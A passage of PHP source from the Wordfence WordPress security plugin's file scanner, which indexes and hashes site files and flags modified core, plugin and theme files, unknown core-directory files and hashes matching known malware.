if($this->pluginsEnabled){ $this->status['plugins'] = wfIssues::statusStart(__("Comparing plugins against WordPress.org originals", 'wordfence')); $this->engine->scanController()->startStage(wfScanner::STAGE_FILE_CHANGES); } else { wfIssues::statusDisabled(__("Skipping plugin scan", 'wordfence')); }
if($this->malwareEnabled){ $this->status['malware'] = wfIssues::statusStart(__("Scanning for known malware files", 'wordfence')); $this->engine->scanController()->startStage(wfScanner::STAGE_MALWARE_SCAN); } else { wfIssues::statusDisabled(__("Skipping malware scan", 'wordfence')); }
if($this->coreUnknownEnabled){ $this->status['coreUnknown'] = wfIssues::statusStart(__("Scanning for unknown files in wp-admin and wp-includes", 'wordfence')); $this->engine->scanController()->startStage(wfScanner::STAGE_FILE_CHANGES); } else { wfIssues::statusDisabled(__("Skipping unknown core file scan", 'wordfence')); }
if ($options['scansEnabled_fileContents']) { $this->engine->scanController()->startStage(wfScanner::STAGE_MALWARE_SCAN); }
if ($options['scansEnabled_fileContentsGSB']) { $this->engine->scanController()->startStage(wfScanner::STAGE_CONTENT_SAFETY); }
if ($this->coreUnknownEnabled && !$this->alertedOnUnknownWordPressVersion && empty($this->knownFiles['core'])) {
require(ABSPATH . 'wp-includes/version.php'); /* @var string $wp_version */
$this->alertedOnUnknownWordPressVersion = true;
$added = $this->engine->addIssue(
'coreUnknown',
wfIssues::SEVERITY_MEDIUM,
'coreUnknown' . $wp_version,
'coreUnknown' . $wp_version,
sprintf(/* translators: WordPress version. */ __('Unknown WordPress core version: %s', 'wordfence'), $wp_version),
__("The core files scan will not be run because this version of WordPress is not currently indexed by Wordfence. This may be due to using a prerelease version or because the servers are still indexing a new release. If you are using an official WordPress release, this issue will automatically dismiss once the version is indexed and another scan is run.", 'wordfence'),
array()
);
if ($added == wfIssues::ISSUE_ADDED || $added == wfIssues::ISSUE_UPDATED) { $this->haveIssues['coreUnknown'] = wfIssues::STATUS_PROBLEM; }
else if ($this->haveIssues['coreUnknown'] != wfIssues::STATUS_PROBLEM && ($added == wfIssues::ISSUE_IGNOREP || $added == wfIssues::ISSUE_IGNOREC)) { $this->haveIssues['coreUnknown'] = wfIssues::STATUS_IGNORED; }
}
$this->initializeProperties();
}
private function initializeProperties() {
$this->scanFileLogger = $this->getScanFileLogger();
$this->knownFileExclude = wordfenceScanner::getExcludeFilePattern(wordfenceScanner::EXCLUSION_PATTERNS_KNOWN_FILES);
}
public function __sleep(){
return array('totalFiles', 'totalDirs', 'totalData', 'stoppedOnFile', 'coreEnabled', 'pluginsEnabled', 'themesEnabled', 'malwareEnabled', 'coreUnknownEnabled', 'knownFiles', 'haveIssues', 'status', 'possibleMalware', 'scannedFiles', 'totalForks', 'alertedOnUnknownWordPressVersion', 'foldersProcessed', 'suspectedFiles', 'indexed', 'indexSize', 'currentIndex', 'coalescingIssues', 'pathMap');
}
public function __wakeup(){
$this->db = new wfDB();
$this->startTime = microtime(true);
$this->totalForks++;
$stored = wfConfig::get_ser('malwarePrefixes', array(), false);
if (!isset($stored['prefixes'])) {
$stored['prefixes'] = '';
}
$this->malwareData = $stored['prefixes'];
$stored = wfConfig::get_ser('coreHashes', array(), false);
if (!isset($stored['hashes'])) {
$stored['hashes'] = '';
}
$this->coreHashesData = $stored['hashes'];
$this->initializeProperties();
}
public function getSuspectedFiles() {
return array_keys($this->suspectedFiles);
}
public function run($engine) {
if($this->totalForks > 1000){
throw new Exception(sprintf(/* translators: File path. */ __("Wordfence file scanner detected a possible infinite loop. Exiting on file: %s", 'wordfence'), $this->stoppedOnFile));
}
$this->engine = $engine;
if (!$this->indexed) {
$start = microtime(true);
$indexedFiles = array();
foreach ($this->scannedFiles as $file) {
$this->_dirIndex($file, $indexedFiles);
}
$this->_serviceIndexQueue($indexedFiles, true);
$this->indexed = true;
unset($this->foldersEntered); $this->foldersEntered = array();
unset($this->foldersProcessed); $this->foldersProcessed = array();
$end = microtime(true);
wordfence::status(4, 'info', sprintf(/* translators: Time in seconds. */ __("Index time: %s", 'wordfence'), ($end - $start)));
}
$this->_checkForTimeout();
wordfence::status(4, 'info', __("Beginning file hashing", 'wordfence'));
while ($file = $this->_nextFile()) {
$this->processFile($file);
wfUtils::afterProcessingFile();
$this->_checkForTimeout($file);
}
$this->processFileRecords(); // Ensure all file records have actually been inserted before processing pending issues
wordfence::status(4, 'info', __("Processing pending issues", 'wordfence'));
$this->_processPendingIssues();
wordfence::status(2, 'info', sprintf(/* translators: 1. Number of files. 2. Data in bytes. */ __('Analyzed %1$d files containing %2$s of data.', 'wordfence'), $this->totalFiles, wfUtils::formatBytes($this->totalData)));
if($this->coreEnabled){ wfIssues::statusEnd($this->status['core'], $this->haveIssues['core']); $this->engine->scanController()->completeStage(wfScanner::STAGE_FILE_CHANGES, $this->haveIssues['core']); }
if($this->themesEnabled){ wfIssues::statusEnd($this->status['themes'], $this->haveIssues['themes']); $this->engine->scanController()->completeStage(wfScanner::STAGE_FILE_CHANGES, $this->haveIssues['themes']); }
if($this->pluginsEnabled){ wfIssues::statusEnd($this->status['plugins'], $this->haveIssues['plugins']); $this->engine->scanController()->completeStage(wfScanner::STAGE_FILE_CHANGES, $this->haveIssues['plugins']); }
if($this->coreUnknownEnabled){ wfIssues::statusEnd($this->status['coreUnknown'], $this->haveIssues['coreUnknown']); $this->engine->scanController()->completeStage(wfScanner::STAGE_FILE_CHANGES, $this->haveIssues['coreUnknown']); }
if(sizeof($this->possibleMalware) > 0){
$malwareResp = $engine->api->binCall('check_possible_malware', json_encode($this->possibleMalware));
if($malwareResp['code'] != 200){
wfIssues::statusEndErr();
throw new Exception(__("Invalid response from Wordfence API during check_possible_malware", 'wordfence'));
}
$malwareList = json_decode($malwareResp['data'], true);
if(is_array($malwareList) && sizeof($malwareList) > 0){
for($i = 0; $i < sizeof($malwareList); $i++){
$file = $malwareList[$i][0];
$md5 = $malwareList[$i][1];
$name = $malwareList[$i][2];
$added = $this->engine->addIssue(
'file',
wfIssues::SEVERITY_CRITICAL,
$file,
$md5,
sprintf(/* translators: File path. */ __('This file is suspected malware: %s', 'wordfence'), $file),
sprintf(/* translators: Malware name/title. */ __("This file's signature matches a known malware file. The title of the malware is '%s'. Immediately inspect this file using the 'View' option below and consider deleting it from your server.", 'wordfence'), $name),
array(
'file' => $file,
'realFile' => array_key_exists($file, $this->pathMap) ? $this->pathMap[$file] : null,
'cType' => 'unknown',
'canDiff' => false,
'canFix' => false,
'canDelete' => true
)
);
if ($added == wfIssues::ISSUE_ADDED || $added == wfIssues::ISSUE_UPDATED) { $this->haveIssues['malware'] = wfIssues::STATUS_PROBLEM; }
else if ($this->haveIssues['malware'] != wfIssues::STATUS_PROBLEM && ($added == wfIssues::ISSUE_IGNOREP || $added == wfIssues::ISSUE_IGNOREC)) { $this->haveIssues['malware'] = wfIssues::STATUS_IGNORED; }
}
}
}
if($this->malwareEnabled){ wfIssues::statusEnd($this->status['malware'], $this->haveIssues['malware']); $this->engine->scanController()->completeStage(wfScanner::STAGE_MALWARE_SCAN, $this->haveIssues['malware']); }
unset($this->knownFiles); $this->knownFiles = false;
}
private function _dirIndex($file, &$indexedFiles) {
$realPath = $file->getRealPath();
//Applies to files and dirs
if (!is_readable($realPath))
return;
if (!$this->_shouldProcessFile($file))
return;
if (is_dir($realPath)) {
if (isset($this->foldersEntered[$realPath]))
return;
$this->foldersEntered[$file->getRealPath()] = 1;
$this->totalDirs++;
try {
foreach (wfFileUtils::getContents($realPath) as $child) {
if (wfFileUtils::isCurrentOrParentDirectory($child)) {
continue;
}
try {
$child = $file->createChild($child);
}
catch (wfInvalidPathException $e) {
wordfence::status(4, 'info', sprintf(__("Ignoring invalid scan file child: %s", 'wordfence'), $e->getPath()));
continue;
}
if (is_file($child->getRealPath())) {
$relativeFile = $child->getWordpressPath();
if ($this->stoppedOnFile && $child->getRealPath() != $this->stoppedOnFile) {
continue;
}
if (preg_match('/\.suspected$/i', $relativeFile)) { //Already iterating over all files in the search areas so generate this list here
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Found .suspected file: %s", 'wordfence'), $relativeFile));
$this->suspectedFiles[$relativeFile] = 1;
}
$this->_checkForTimeout($child, $indexedFiles);
if ($this->_shouldHashFile($child)) {
$indexedFiles[] = $child;
}
else {
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Skipping unneeded hash: %s", 'wordfence'), (string) $child));
}
$this->_serviceIndexQueue($indexedFiles);
}
elseif (is_dir($child->getRealPath())) {
$this->_dirIndex($child, $indexedFiles);
}
}
}
catch (wfInaccessibleDirectoryException $e) {
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Skipping inaccessible directory: %s", 'wordfence'), (string) $file));
}
$this->foldersProcessed[$realPath] = 1;
unset($this->foldersEntered[$realPath]);
}
else {
if (is_file($realPath)) {
$relativeFile = $file->getWordpressPath();
if ($this->stoppedOnFile && $realPath != $this->stoppedOnFile) {
return;
}
if (preg_match('/\.suspected$/i', $relativeFile)) { //Already iterating over all files in the search areas so generate this list here
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Found .suspected file: %s", 'wordfence'), $relativeFile));
$this->suspectedFiles[$relativeFile] = 1;
}
$this->_checkForTimeout($file, $indexedFiles);
if ($this->_shouldHashFile($file)) {
$indexedFiles[] = $file;
}
else {
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Skipping unneeded hash: %s", 'wordfence'), (string) $file));
}
$this->_serviceIndexQueue($indexedFiles);
}
}
}
private function _serviceIndexQueue(&$indexedFiles, $final = false) {
$files = array();
if (count($indexedFiles) > 500) {
$files = array_splice($indexedFiles, 0, 500);
}
else if ($final) {
$files = $indexedFiles;
$indexedFiles = array();
}
$fileCount = count($files);
if ($fileCount > 0) {
$payload = array();
foreach ($files as $file) {
$payload[] = (string) $file;
$payload[] = $file->getWordpressPath();
}
global $wpdb;
$table_wfKnownFileList = wfDB::networkTable('wfKnownFileList');
$query = substr("INSERT INTO {$table_wfKnownFileList} (path, wordpress_path) VALUES " . str_repeat("('%s', '%s'), ", count($files)), 0, -2);
$wpdb->query($wpdb->prepare($query, $payload));
$this->indexSize += $fileCount;
wordfence::status(2, 'info', sprintf(/* translators: Number of files. */ __("%d files indexed", 'wordfence'), $this->indexSize));
}
}
private function _loadFileBatch() {
global $wpdb;
$table_wfKnownFileList = wfDB::networkTable('wfKnownFileList');
$rows = $wpdb->get_results($wpdb->prepare("SELECT id, path, wordpress_path FROM {$table_wfKnownFileList} WHERE id > %d ORDER BY id ASC LIMIT 500", $this->currentIndex));
end($rows);
while (($row = prev($rows)) !== false) {
$this->currentFile = new wfScanFileListItem($row->id, $row->path, $row->wordpress_path, $this->currentFile);
}
}
private function _nextFile() {
if ($this->currentFile !== null)
$this->currentFile = $this->currentFile->getNext();
if ($this->currentFile === null) {
$this->_loadFileBatch();
}
if ($this->currentFile !== null)
$this->currentIndex = $this->currentFile->getId();
return $this->currentFile;
}
private function _checkForTimeout($file = null, $indexQueue = false) {
$realPath = $file ? $file->getRealPath() : null;
if (($this->stoppedOnFile !== $realPath) && $this->engine->shouldFork()) { //max X seconds but don't allow fork if we're looking for the file we stopped on. Search mode is VERY fast.
$this->processFileRecords(false);
if ($indexQueue !== false) {
$this->_serviceIndexQueue($indexQueue, true);
$this->stoppedOnFile = $realPath;
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Forking during indexing: %s", 'wordfence'), (string) $file));
}
else {
wordfence::status(4, 'info', sprintf(/* translators: PHP max execution time. */ __("Calling fork() from wordfenceHash with maxExecTime: %s", 'wordfence'), $this->engine->maxExecTime));
}
$this->engine->fork();
//exits
}
if ($this->stoppedOnFile && $realPath != $this->stoppedOnFile && $indexQueue !== false) {
return;
}
else if ($this->stoppedOnFile && $realPath == $this->stoppedOnFile) {
$this->stoppedOnFile = false; //Continue indexing
}
}
private function _shouldProcessFile($file) {
$excludePatterns = wordfenceScanner::getExcludeFilePattern(wordfenceScanner::EXCLUSION_PATTERNS_USER);
if ($excludePatterns) {
foreach ($excludePatterns as $pattern) {
if (preg_match($pattern, $file->getWordpressPath())) {
return false;
}
}
}
$realPath = $file->getRealPath();
if ($realPath === '/') {
return false;
}
if (isset($this->foldersProcessed[$realPath])) {
return false;
}
return true;
}
private function getScanFileLogger() {
if (function_exists('memory_get_usage')) {
return function($realPath) {
wordfence::status(4, 'info', sprintf(/* translators: 1. File path. 2. Memory in bytes. */ __('Scanning: %1$s (Mem:%2$s)', 'wordfence'), $realPath, sprintf('%.1fM', memory_get_usage(true) / (1024 * 1024))));
};
}
else {
return function($realPath) {
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Scanning: %s", 'wordfence'), $realPath));
};
}
}
private function isKnownFileScanAllowed($realPath) {
if ($this->knownFileExclude) {
foreach ($this->knownFileExclude as $pattern) {
if (preg_match($pattern, $realPath)) {
return false;
}
}
}
return true;
}
private function getKnownFileType($properties) {
if ($this->isKnownFileScanAllowed($properties->realPath)) {
foreach (self::$KNOWN_FILE_TYPES as $type) {
if (isset($this->knownFiles[$type][$properties->wordpressPath]))
return $type;
}
if ($this->coreUnknownEnabled && !$this->alertedOnUnknownWordPressVersion)
return self::KNOWN_FILE_OTHER;
}
return null;
}
private function checkKnownCoreFile($properties) {
if (strtoupper($this->knownFiles['core'][$properties->wordpressPath]) == $properties->shac) {
$properties->freeContent();
return true;
}
else {
if ($this->coreEnabled) {
if ($properties->loadContent() && (!preg_match('/<\?' . 'php[\r\n\s\t]*\/\/[\r\n\s\t]*Silence is golden\.[\r\n\s\t]*(?:\?>)?[\r\n\s\t]*$/s', $properties->content))) {
$this->engine->addPendingIssue(
'knownfile',
wfIssues::SEVERITY_HIGH,
'coreModified' . $properties->wordpressPath,
'coreModified' . $properties->wordpressPath . $properties->md5,
sprintf(/* translators: File path. */ __('WordPress core file modified: %s', 'wordfence'), $properties->wordpressPath),
__("This WordPress core file has been modified and differs from the original file distributed with this version of WordPress.", 'wordfence'),
array(
'file' => $properties->wordpressPath,
'realFile' => $properties->realPath,
'cType' => 'core',
'canDiff' => true,
'canFix' => true,
'canDelete' => false,
'haveIssues' => 'core'
)
);
}
}
return false;
}
}
private function checkKnownPluginFile($properties) {
if (in_array($properties->shac, $this->knownFiles[self::KNOWN_FILE_PLUGIN][$properties->wordpressPath])) {
return true;
}
else {
if ($this->pluginsEnabled) {
$options = $this->engine->scanController()->scanOptions();
$shouldGenerateIssue = true;
if (!$options['scansEnabled_highSense'] && preg_match('~/readme\.(?:txt|md)$~i', $properties->wordpressPath)) { //Don't generate issues for changed readme files unless high sensitivity is on
$shouldGenerateIssue = false;
}
if ($shouldGenerateIssue) {
$itemName = $this->knownFiles['plugins'][$properties->wordpressPath][0];
$itemVersion = $this->knownFiles['plugins'][$properties->wordpressPath][1];
$cKey = $this->knownFiles['plugins'][$properties->wordpressPath][2];
$this->engine->addPendingIssue(
'knownfile',
wfIssues::SEVERITY_MEDIUM,
'modifiedplugin' . $properties->wordpressPath,
'modifiedplugin' . $properties->wordpressPath . $properties->md5,
sprintf(/* translators: File path. */ __('Modified plugin file: %s', 'wordfence'), $properties->wordpressPath),
sprintf(
/* translators: 1. Plugin name. 2. Plugin version. 3. Support URL. */
__('This file belongs to plugin "%1$s" version "%2$s" and has been modified from the file that is distributed by WordPress.org for this version. Please use the link to see how the file has changed. If you have modified this file yourself, you can safely ignore this warning. If you see a lot of changed files in a plugin that have been made by the author, then try uninstalling and reinstalling the plugin to force an upgrade. Doing this is a workaround for plugin authors who don\'t manage their code correctly. <a href="%3$s" target="_blank" rel="noopener noreferrer">Learn More<span class="screen-reader-text"> (' . esc_html__('opens in new tab', 'wordfence') . ')</span></a>', 'wordfence'),
$itemName,
$itemVersion,
wfSupportController::esc_supportURL(wfSupportController::ITEM_SCAN_RESULT_MODIFIED_PLUGIN)
),
array(
'file' => $properties->wordpressPath,
'realFile' => $properties->realPath,
'cType' => 'plugin',
'canDiff' => true,
'canFix' => true,
'canDelete' => false,
'cName' => $itemName,
'cVersion' => $itemVersion,
'cKey' => $cKey,
'haveIssues' => 'plugins'
)
);
}
}
return false;
}
}
private function checkKnownThemeFile($properties) {
if (in_array($properties->shac, $this->knownFiles[self::KNOWN_FILE_THEME][$properties->wordpressPath])) {
return true;
}
else {
if ($this->themesEnabled) {
$options = $this->engine->scanController()->scanOptions();
$shouldGenerateIssue = true;
if (!$options['scansEnabled_highSense'] && preg_match('~/readme\.(?:txt|md)$~i', $properties->wordpressPath)) { //Don't generate issues for changed readme files unless high sensitivity is on
$shouldGenerateIssue = false;
}
if ($shouldGenerateIssue) {
$itemName = $this->knownFiles['themes'][$properties->wordpressPath][0];
$itemVersion = $this->knownFiles['themes'][$properties->wordpressPath][1];
$cKey = $this->knownFiles['themes'][$properties->wordpressPath][2];
$this->engine->addPendingIssue(
'knownfile',
wfIssues::SEVERITY_MEDIUM,
'modifiedtheme' . $properties->wordpressPath,
'modifiedtheme' . $properties->wordpressPath . $properties->md5,
sprintf(/* translators: File path. */ __('Modified theme file: %s', 'wordfence'), $properties->wordpressPath),
sprintf(
/* translators: 1. Plugin name. 2. Plugin version. 3. Support URL. */
__('This file belongs to theme "%1$s" version "%2$s" and has been modified from the original distribution. It is common for site owners to modify their theme files, so if you have modified this file yourself you can safely ignore this warning. <a href="%3$s" target="_blank" rel="noopener noreferrer">Learn More<span class="screen-reader-text"> (' . esc_html__('opens in new tab', 'wordfence') . ')</span></a>', 'wordfence'),
$itemName,
$itemVersion,
wfSupportController::esc_supportURL(wfSupportController::ITEM_SCAN_RESULT_MODIFIED_THEME)
),
array(
'file' => $properties->wordpressPath,
'realFile' => $properties->realPath,
'cType' => 'theme',
'canDiff' => true,
'canFix' => true,
'canDelete' => false,
'cName' => $itemName,
'cVersion' => $itemVersion,
'cKey' => $cKey,
'haveIssues' => 'themes'
)
);
}
}
return false;
}
}
private function checkKnownFileOther($properties) {
$restrictedWordPressFolders = array(ABSPATH . 'wp-admin/', ABSPATH . WPINC . '/');
$added = false;
foreach ($restrictedWordPressFolders as $path) {
if (strpos($properties->realPath, $path) === 0) {
if ($this->isPreviousCoreFile($properties->shac)) {
$added = $this->engine->addIssue(
'knownfile',
wfIssues::SEVERITY_LOW,
'coreUnknown' . $properties->wordpressPath,
'coreUnknown' . $properties->wordpressPath . $properties->md5,
sprintf(/* translators: File path. */ __('Old WordPress core file not removed during update: %s', 'wordfence'), $properties->wordpressPath),
__('This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.', 'wordfence'),
array(
'file' => $properties->wordpressPath,
'realFile' => $properties->realPath,
'cType' => 'core',
'canDiff' => false,
'canFix' => false,
'canDelete' => true,
)
);
}
else if (preg_match('#/php\.ini$#', $properties->wordpressPath)) {
$this->engine->addPendingIssue(
'knownfile',
wfIssues::SEVERITY_HIGH,
'coreUnknown' . $properties->wordpressPath,
'coreUnknown' . $properties->wordpressPath . $properties->md5,
sprintf(/* translators: File path. */ __('Unknown file in WordPress core: %s', 'wordfence'), $properties->wordpressPath),
__('This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker.', 'wordfence'),
array(
'file' => $properties->wordpressPath,
'realFile' => $properties->realPath,
'cType' => 'core',
'canDiff' => false,
'canFix' => false,
'canDelete' => true,
'coalesce' => 'php.ini',
'learnMore' => wfSupportController::supportURL(wfSupportController::ITEM_SCAN_RESULT_UNKNOWN_FILE_CORE),
'haveIssues' => 'coreUnknown',
)
);
}
else {
$added = $this->engine->addIssue(
'knownfile',
wfIssues::SEVERITY_HIGH,
'coreUnknown' . $properties->wordpressPath,
'coreUnknown' . $properties->wordpressPath . $properties->md5,
sprintf(/* translators: File path. */ __('Unknown file in WordPress core: %s', 'wordfence'), $properties->wordpressPath),
sprintf(/* translators: Support URL. */ __('This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href="%s" target="_blank" rel="noopener noreferrer">Learn More<span class="screen-reader-text"> (' . esc_html__('opens in new tab', 'wordfence') . ')</span></a>', 'wordfence'), wfSupportController::esc_supportURL(wfSupportController::ITEM_SCAN_RESULT_UNKNOWN_FILE_CORE)),
array(
'file' => $properties->wordpressPath,
'realFile' => $properties->realPath,
'cType' => 'core',
'canDiff' => false,
'canFix' => false,
'canDelete' => true,
)
);
}
}
}
if ($added == wfIssues::ISSUE_ADDED || $added == wfIssues::ISSUE_UPDATED) { $this->haveIssues['coreUnknown'] = wfIssues::STATUS_PROBLEM; }
else if ($this->haveIssues['coreUnknown'] != wfIssues::STATUS_PROBLEM && ($added == wfIssues::ISSUE_IGNOREP || $added == wfIssues::ISSUE_IGNOREC)) { $this->haveIssues['coreUnknown'] = wfIssues::STATUS_IGNORED; }
return false;
}
private function checkKnownFile($properties, $type) {
switch ($type) {
case self::KNOWN_FILE_CORE:
return $this->checkKnownCoreFile($properties);
case self::KNOWN_FILE_PLUGIN:
return $this->checkKnownPluginFile($properties);
case self::KNOWN_FILE_THEME:
return $this->checkKnownThemeFile($properties);
case self::KNOWN_FILE_OTHER:
return $this->checkKnownFileOther($properties);
}
}
private function recordFile($properties) {
$this->fileRecords[$properties->wordpressPathMd5] = $properties;
$this->fileRecordCount++;
if ($this->fileRecordCount >= self::MAX_QUEUED_RECORDS)
$this->processFileRecords();
}
private function processFileRecords($check = true) {
if ($this->fileRecordCount == 0)
return;
$this->db->insert(
wfDB::networkTable('wfFileMods'),
[
'filename' => '%s',
'real_path' => '%s',
'filenameMD5' => 'UNHEX(%s)',
'knownFile' => '%d',
'newMD5' => 'UNHEX(%s)',
'SHAC' => 'UNHEX(%s)',
],
array_map(function($properties) {
return [
$properties->wordpressPath,
$properties->realPath,
$properties->wordpressPathMd5,
(int) $properties->known,
$properties->md5,
$properties->shac,
];
}, $this->fileRecords),
[
'newMD5',
'SHAC',
'knownFile'
]
);
$this->fileRecords = [];
$this->fileRecordCount = 0;
}
private function processFile($file) {
$properties = $file->initializeProperties();
try {
$properties->realPath = $file->getRealPath();
$wordpressPath = $file->getWordpressPath();
if (wfUtils::fileTooBig($properties->realPath, $fileSize, $properties->handle)) {
wordfence::status(4, 'info', sprintf(/* translators: File path. */ __("Skipping file larger than max size: %s", 'wordfence'), $properties->realPath));
return;
}
call_user_func($this->scanFileLogger, $properties->realPath);
$knownFileType = $this->getKnownFileType($properties);
$allowKnownFileScan = $knownFileType !== null;
$hashed = self::hashFile($properties->realPath, $properties);
$this->engine->scanController()->incrementSummaryItem(wfScanner::SUMMARY_SCANNED_FILES);
if (!$hashed) {
//wordfence::status(2, 'error', "Could not gen hash for file (probably because we don't have permission to access the file): $properties->realPath");
return;
}
$properties->known = $allowKnownFileScan && $this->checkKnownFile($properties, $knownFileType);
if($this->malwareEnabled && $this->isMalwarePrefix($properties->md5)){
$this->possibleMalware[] = array($properties->wordpressPath, $properties->md5);
$this->pathMap[$properties->wordpressPath] = $properties->realPath;
}
$this->recordFile($properties);
$this->totalFiles++;
$this->totalData += $fileSize;
if($this->totalFiles % 100 === 0){
wordfence::status(2, 'info', sprintf(
/* translators: 1. Number of files. 2. Data in bytes. */
__('Analyzed %1$d files containing %2$s of data so far', 'wordfence'),
$this->totalFiles,
wfUtils::formatBytes($this->totalData)
));
}
}
finally {
$properties->releaseHandle();
}
}
private function flagSafeFiles($filenames) {
$fileModsTable = wfDB::networkTable('wfFileMods');
$allSafeFiles = [];
$existingSafeFiles = $this->db->selectAll(
$fileModsTable,
[
'filename'
],
[
'filename' => $filenames,
'isSafeFile' => '1'
]
);
foreach ($existingSafeFiles as $row) {
$allSafeFiles[$row[0]] = true;
}
$remainingFilenames = [];
foreach ($filenames as $filename) {
if (!array_key_exists($filename, $allSafeFiles))
$remainingFilenames[] = $filename;
}
$filenames = $remainingFilenames;
do {
$results = $this->db->select(
$fileModsTable,
[
'HEX(filenameMD5)',
'UPPER(HEX(SHAC))',
'filename'
],
[
'filename' => $filenames,
'isSafeFile' => '?'
]
);
$hashes = array_column($results, 1);
$safeHashes = array_flip($this->engine->isSafeFile($hashes));
$safeFiles = [];
$unsafeFiles = [];
foreach ($results as $row) {
$filenameMD5Hex = $row[0];
if (array_key_exists($row[1], $safeHashes)) {
$safeFiles[] = $filenameMD5Hex;
$allSafeFiles[$row[2]] = true;
}
else {
$unsafeFiles[] = $filenameMD5Hex;
}
}
foreach (['1' => $safeFiles, '0' => $unsafeFiles] as $safe => $files) {
if (count($files) == 0)
continue;
$this->db->update(
$fileModsTable,
[
'isSafeFile' => [ '%s', $safe ]
],
[
'filenameMD5' => $files
],
[
'filenameMD5' => 'UNHEX(%s)'
]
);
}
} while (!empty($results));
return $allSafeFiles;
}
private function _processPendingIssues() {
$count = $this->engine->getPendingIssueCount();
$offset = 0;
while ($offset < $count) {
$issues = $this->engine->getPendingIssues($offset);
if (count($issues) == 0) {
break;
}
$safeFiles = $this->flagSafeFiles(array_map(function($i) { return $i['data']['file']; }, $issues));
//Migrate non-safe file issues to official issues and begin coalescing tagged issues
foreach ($issues as &$i) {
if (!array_key_exists($i['data']['file'], $safeFiles)) {
$haveIssuesType = $i['data']['haveIssues'];
if (isset($i['data']['coalesce'])) {
$key = $i['data']['coalesce'];
if (!isset($this->coalescingIssues[$key])) { $this->coalescingIssues[$key] = array('count' => 0, 'issue' => $i); }
$this->coalescingIssues[$key]['count']++;
}
else {
$added = $this->engine->addIssue(
$i['type'],
$i['severity'],
$i['ignoreP'],
$i['ignoreC'],
$i['shortMsg'],
$i['longMsg'],
$i['data'],
true //Prevent ignoreP and ignoreC from being hashed again
);
if ($added == wfIssues::ISSUE_ADDED || $added == wfIssues::ISSUE_UPDATED) { $this->haveIssues[$haveIssuesType] = wfIssues::STATUS_PROBLEM; }
else if ($this->haveIssues[$haveIssuesType] != wfIssues::STATUS_PROBLEM && ($added == wfIssues::ISSUE_IGNOREP || $added == wfIssues::ISSUE_IGNOREC)) { $this->haveIssues[$haveIssuesType] = wfIssues::STATUS_IGNORED; }
}
}
}
$offset += count($issues);
$this->engine->checkForKill();
}
//Insert the coalesced issues (currently just multiple php.ini in system directories)
foreach ($this->coalescingIssues as $c) {
$count = $c['count'];
$i = $c['issue'];
$haveIssuesType = $i['data']['haveIssues'];
$added = $this->engine->addIssue(
$i['type'],
$i['severity'],
$i['ignoreP'],
$i['ignoreC'],
$i['shortMsg'] . ($count > 1 ? ' ' . sprintf(/* translators: Number of scan results. */ __('(+ %d more)', 'wordfence'), $count - 1) : ''),
$i['longMsg'] . ($count > 1 ? ' ' . ($count > 2 ? sprintf(/* translators: Number of files. */ __('%d more similar files were found.', 'wordfence'), $count - 1) : __('1 more similar file was found.', 'wordfence')) : '') . (isset($i['data']['learnMore']) ? ' ' . sprintf(__('<a href="%s" target="_blank" rel="noopener noreferrer">Learn More<span class="screen-reader-text"> (' . esc_html__('opens in new tab', 'wordfence') . ')</span></a>', 'wordfence'), esc_attr($i['data']['learnMore'])) : ''),
$i['data'],
true //Prevent ignoreP and ignoreC from being hashed again
);
if ($added == wfIssues::ISSUE_ADDED || $added == wfIssues::ISSUE_UPDATED) { $this->haveIssues[$haveIssuesType] = wfIssues::STATUS_PROBLEM; }
else if ($this->haveIssues[$haveIssuesType] != wfIssues::STATUS_PROBLEM && ($added == wfIssues::ISSUE_IGNOREP || $added == wfIssues::ISSUE_IGNOREC)) { $this->haveIssues[$haveIssuesType] = wfIssues::STATUS_IGNORED; }
}
}
public static function hashFile($file, &$properties) {
if (!$properties->resetHandle()) {
return false;
}
$md5Context = hash_init('md5');
$sha256Context = hash_init('sha256');
while (!feof($properties->handle)) {
$data = fread($properties->handle, 65536);
if ($data === false) {
return false;
}
hash_update($md5Context, $data);
hash_update($sha256Context, str_replace(array("\n","\r","\t"," "),"", $data));
}
$properties->md5 = strtoupper(hash_final($md5Context, false));
$properties->shac = strtoupper(hash_final($sha256Context, false));
return true;
}
private function _shouldHashFile($file) {
$wordpressPath = $file->getWordpressPath();
//Core File, return true
if ((isset($this->knownFiles['core']) && isset($this->knownFiles['core'][$wordpressPath])) ||
(isset($this->knownFiles['plugins']) && isset($this->knownFiles['plugins'][$wordpressPath])) ||
(isset($this->knownFiles['themes']) && isset($this->knownFiles['themes'][$wordpressPath]))) {
return true;
}
//Excluded file, return false
$excludePatterns = wordfenceScanner::getExcludeFilePattern(wordfenceScanner::EXCLUSION_PATTERNS_USER | wordfenceScanner::EXCLUSION_PATTERNS_MALWARE);
if ($excludePatterns) {
foreach ($excludePatterns as $pattern) {
if (preg_match($pattern, $wordpressPath)) {
return false;
}
}
}
//Unknown file in a core location
if ($this->coreUnknownEnabled && !$this->alertedOnUnknownWordPressVersion) {
$restrictedWordPressFolders = array(ABSPATH . 'wp-admin/', ABSPATH . WPINC . '/');
foreach ($restrictedWordPressFolders as $path) {
if (strpos($file->getRealPath(), $path) === 0) {
return true;
}
}
}
//Determine treatment
$fileExt = '';
if (preg_match('/\.([a-zA-Z\d\-]{1,7})$/', $wordpressPath, $matches)) {
$fileExt = strtolower($matches[1]);
}
$isPHP = false;
if (preg_match('/\.(?:php(?:\d+)?|phtml)(\.|$)/i', $wordpressPath)) {
$isPHP = true;
}
$isHTML = false;
if (preg_match('/\.(?:html?)(\.|$)/i', $wordpressPath)) {
$isHTML = true;
}
$isJS = false;
if (preg_match('/\.(?:js|svg)(\.|$)/i', $wordpressPath)) {
$isJS = true;
}
$options = $this->engine->scanController()->scanOptions();
//If scan images is disabled, only allow .js through
